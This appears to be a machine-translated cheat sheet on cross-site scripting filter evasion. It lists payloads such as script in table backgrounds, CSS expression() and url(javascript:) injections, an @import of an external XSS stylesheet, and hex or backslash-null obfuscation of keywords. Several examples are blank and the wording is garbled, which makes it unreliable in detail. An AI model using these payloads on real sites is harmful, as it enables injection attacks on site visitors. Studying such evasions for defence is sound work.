1. Script Insertion
(1) Insert JavaScript and VBScript normal characters.
Example 1:
Example 2:<table background= "Javascript:alert (/xss/)" ></table> "/inserting a script in a table
Example 3:
(2) Convert character type. convert any or all of the characters in JavaScript or VBScript to decimal or hexadecimal characters
Example 1: "/convert J character to decimal character J.
Example 2: "/convert J character to hexadecimal character J.
(3) inserting confusing characters. in the system control character, except for the head & #00 (NULL) and the tail (DEL), the other 31 characters can be used as obfuscation characters, such as, and so on can be inserted into the
The head of JavaScript or VBScript where tab characters, line feeds, and carriage returns can also be inserted anywhere in the code.
Example 1: "/INSERT into the code header, which can be written as the effect
Example 2: "/inserted anywhere in the code, which can be written as
Example 3: "/is a 16-binary form of carriage return
Example 4: "/is a 16 binary form of line break
2. Style Sheets
(1) using CSS code @import, expression trigger XSS vulnerability.
Example 1: @import "HTTP://WEB/XSS.CSS"; ' Import a CSS style sheet with external XSS code.
Example 2: @import ' Javascript:alert ("XSS"); ' Invoke JavaScript script trigger vulnerability
Example 3:body{xss:expression (' XSS ')} ' adding an expression event to an internal style sheet
Example 4:
(2) Adding JavaScript and VBScript scripts to CSS code
Example 1:body{background-image:url (Javascript:alert ("XSS"))}
Example 2:body{background-image:url (Vbscript:msgbox ("XSS"))}
(3) Convert character types, substituting hexadecimal characters for one or all of the characters:
Example 1:@\0069mport:url (WEB/1.CSS); ' Convert the I to \0069
Example 2:body{xss:\0065xpression (Alert (' XSS ')} '//convert E to \0065
Example 3:body{background-image:\0075\0072\006c ...} ' Convert URLs to 16 binary
(4) Inserting obfuscation characters, in CSS,/**/is a comment character, except/**/, the characters "\" and Terminator "\0″ are also ignored and can be used to confuse characters.
Example 1:@\0im\port ' \0ja\vasc\ript:alert ("XSS") ';
Example 2:@\i\0m\00p\000o\0000\00000r\000000t "url";
XSS code trigger conditions, common methods for inserting XSS code